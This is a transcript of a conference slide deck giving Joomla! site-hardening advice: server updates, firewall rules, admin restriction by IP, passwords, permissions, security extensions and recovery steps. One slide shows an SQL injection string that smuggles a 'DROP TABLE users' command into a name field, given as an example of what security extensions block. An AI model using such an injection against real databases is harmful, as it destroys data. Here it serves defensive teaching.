Hidden Secrets For A Hack-Proof Joomla! Site
-
Upload
daniel-kanchev -
Category
Technology
-
view
185 -
download
5
description
Transcript of Hidden Secrets For A Hack-Proof Joomla! Site
HIDDEN SECRETS FOR A HACK-PROOF JOOMLA!
Daniel Kanchev @dvkanchev
BEFORE WE BEGIN …
✓ 7+ Years Of Joomla! Experience
✓ 6 Years With SiteGround
✓ Love Travelling The World
✓ Addicted To Extreme Sports
✓ Application/Extension Developers
✓ Hosting Providers/System Administrators
✓ YOU (End Joomla! Users)
WHO SHOULD CARE ABOUT SECURITY ?
✓Application/Extension Developers
✓Hosting Providers/System Administrators
✓YOU (End Joomla! Users)
WHO SHOULD CARE ABOUT SECURITY ?
EVERYONE
WHY SHOULD YOU CARE ?
✓ Be Trustworthy By Protecting Your Clients’ Data
✓ Have A Healthy Site - Avoid Substantial Data
Loss/Downtime
HOW HACKERS WORK?
EVERYONE’S RESPONSIBLE!
!!
KEEP
CALM IT’S NOT
ROCKET
SCIENCE
SECURITY IS A PROCESS!
IS YOUR SERVER SETUP RIGHT?
SERVER CONFIG & TIPS✓ Always Update Your Server Software
✓ Harden The Linux Kernel - grsecurity
✓ Chroot Processes
✓ Provide Only Restricted Shell Access
✓ Disable/Remove Unused Services
SOLUTIONS: 1H Hive, Better Linux, CloudLinux
PROTECT YOUR WEB SERVER
✓ OWASP Rules - http://goo.gl/rC7Uz
✓ Atomic Rules - http://goo.gl/Fv3Vn
✓ Trustwave Paid Rules - http://goo.gl/9IAaB
PROTECT JOOMLA!
#1: UPDATE EVERYTHING!
SITEGROUND AUTO UPDATES
#2: DO THE BASICS
✓ Change The Default “admin” username
✓ Change The Default “jos_” DB Prefix
✓ Password Protect Your Administrator Folder
#3: RESTRICT THE ADMIN AREA BY IP
✓ Step 1: Check Your IP: whatismyip.com
✓ Add This Rule To Your .htaccess File
deny from all allow from YOUR_IP_ADDRESS
#4: KEEP PHP SCRIPTS IN THE RIGHT FOLDERS
<Files *.php> deny from all </Files>
✓ Avoid password generators
✓ Don’t use common words
✓ Avoid personal info, names
and significant dates:
daniel123
#5: USE BULLET-PROOF PASSWORDS
THE PERFECT PASSWORD✓ Choose A Favourite (Not Famous) Movie
Quote/Phrase From A Book:
✓ Add Punctuation Symbols (?!.,:) And Capital Letters,
Remove Whitespaces:
We all go a little mad sometimes
We.all?go!AlittleMad2sometimes
#6: CHECK YOUR EXTENSIONS
✓Joomla! Vulnerable Extensions List (VEL): http://vel.joomla.org/
✓National Vulnerability Database: http://web.nvd.nist.gov/view/vuln/search
#7: STAY ON TOP OF SECURITY UPDATES
✓http://feeds.joomla.org/JoomlaSecurityNews
✓http://feeds.joomla.org/
JoomlaSecurityVulnerableExtensions
#8: FIX YOUR PERMISSIONS AND OWNERSHIP
✓Folders: 0755
✓Files: 0644
✓All files/folders should be owned by your
main FTP user
✓NEVER EVER USE 777 permissions
#9: ADDITIONAL PROTECTION THROUGH .htaccess FILE
✓ Remove PHP Sensitive Information
✓ Avoid Visual FingerPrinting
✓ Block Some Popular Tools Used By Hackers
How To Do It: http://is.gd/pGfVXQ
#10: USE JOOMLA! SECURITY EXTENSIONS FOR IDS/IPS
✓ jHackGuard
✓ Akeeba Admin Tools
✓ jomDefender
✓ jSecure
SQL INJECTIONSELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
jHackGuard SETUP
✓ SQL Injections
✓ Remote URL/File Inclusions
✓ Remote Code Execution
✓ XSS Based Attacks
#11: BACKUP! BACKUP! BACKUP!
NOW WHAT?
DON’T PANIC!
DISASTER RECOVERY PLAN1. Create A Copy Of The Hacked Site + All Logs
2. Restore From A Clean Backup
3. Quarantine Your Site - Maintenance Mode
4. Check The Logs For The Malicious Code
5. Resolve The Security Issues/Clean Malicious Code
6. Unquarantine Your Site
FEW THINGS TO TAKE AWAY
✓ Security Is About Making It Harder To
Infiltrate - Not Making It Impossible
✓ Security Is An Ongoing Process
✓ Everyone Is Involved
QUESTIONS ?
THANK YOU!Daniel Kanchev @dvkanchev